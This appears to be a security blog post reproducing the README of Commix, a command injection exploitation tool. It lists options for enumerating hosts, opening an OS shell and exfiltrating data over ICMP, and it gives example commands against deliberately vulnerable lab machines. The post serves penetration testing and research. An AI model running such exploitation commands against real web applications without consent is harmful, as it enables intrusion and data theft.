Never Ending Security

It starts all here

Commix – An Command Injection Exploiter To Test And Find Web Application Bugs

   ___    ___     ___ ___     ___ ___ /\_\   __  _ 
  /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\
 /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </
 \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\
  \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ { v0.1b }

Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2015 Anastasios Stasinopoulos (@ancst)

General Information

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in Python programming language.


The tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes!!


Python version 2.6.x or 2.7.x is required for running this program.


Commix comes pre-installed on the following Linux distributions:

Download commix by cloning the Git repository:

git clone commix


Usage: python [options]


-h, --help            Show help and exit.
--verbose             Enable the verbose mode.
--install             Install 'commix' to your system.
--version             Show version number and exit.
--update              Check for updates (apply if any) and exit.


This options has to be provided, to define the target URL.

--url=URL           Target URL
--url-reload        Reload target URL after command execution.


These options can be used, to specify how to connect to the target

--host=HOST         HTTP Host header.
--referer=REFERER   HTTP Referer header.
--user-agent=AGENT  HTTP User-Agent header.
--cookie=COOKIE     HTTP Cookie header.
--random-agent      Use a randomly selected HTTP User-Agent header.
--headers=HEADERS   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
--proxy=PROXY       Use a HTTP proxy (e.g. '').
--auth-url=AUTH_..  Login panel URL.
--auth-data=AUTH..  Login parameters and data.
--auth-cred=AUTH..  HTTP Basic Authentication credentials (e.g.


These options can be used, to enumerate the target host.

--current-user  Retrieve current user.
--hostname      Retrieve server hostname.
--is-root       Check if the current user have root privs.
--sys-info      Retrieve system information.


These options can be used, to specify which parameters to inject and
to provide custom injection payloads.

--data=DATA         POST data to inject (use 'INJECT_HERE' tag to specify
                    the testable parameter).
--suffix=SUFFIX     Injection payload suffix string.
--prefix=PREFIX     Injection payload prefix string.
--technique=TECH    Specify a certain injection technique : 'classic',
                    'eval-based', 'time-based' or 'file-based'.
--maxlen=MAXLEN     The length of the output on time-based technique
                    (Default: 10000 chars).
--delay=DELAY       Set Time-delay for time-based and file-based
                    techniques (Default: 1 sec).
--base64            Use Base64 (enc)/(de)code trick to prevent false-
                    positive results.
--tmp-path=TMP_P..  Set remote absolute path of temporary files directory.
--root-dir=SRV_R..  Set remote absolute path of web server's root
                    directory (Default: /var/www/).
--icmp-exfil=IP_..  Use the ICMP exfiltration technique (e.g.
--alter-shell       Use an alternative os-shell (Python). Available only
                    for 'tempfile-based' injections.
--os-shell=OS_SH..  Execute a single operating system command.

Usage Examples

Exploiting Damn Vulnerable Web App:

python --url="" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

Exploiting php-Charts 1.0 using injection payload suffix & prefix string:

python --url="" --prefix="'" --suffix="//"

Exploiting OWASP Mutillidae using extra headers and HTTP proxy:

python --url="" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy=""

Exploiting Persistence using ICMP exfiltration technique :

su -c "python --url="" --data="addr=" --icmp-exfil="ip_src=,ip_dst=""

Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:

python --url="" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="file-based" --root-dir="/"

Command injection testbeds

A collection of pwnable VMs, that includes web apps vulnerable to command injections.

Exploitation Demos

More information can be found at:


Leave a Reply

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s